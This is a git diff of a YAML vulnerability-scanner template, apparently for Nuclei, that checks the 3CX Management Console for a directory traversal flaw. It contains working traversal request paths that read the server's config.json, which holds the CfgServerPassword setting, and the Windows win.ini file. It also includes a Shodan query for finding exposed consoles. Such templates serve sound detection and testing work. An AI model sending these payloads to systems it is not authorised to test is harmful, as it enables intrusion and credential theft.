diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml
index d7b65cf743..2e5ebb74f8 100644
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@@ -5,23 +5,30 @@ info:
   author: random-robbie
   severity: high
   description: Directory traversal vulnerability on 3CX Management Console.
+  reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
   metadata:
     shoda-query: http.title:"3CX Phone System Management Console"
-  reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
   tags: 3cx,lfi,voip
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
-      - '{{BaseURL}}/Electron/download/windows/C:drivers\etc\hosts'
-    matchers-condition: and
+      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
+
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "CfgServerPassword"
-          - "acme"
+      - type: word
         part: body
+        words:
+          - "CfgServerPassword"
+          - "CfgServerAppName"
+        condition: and
+
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and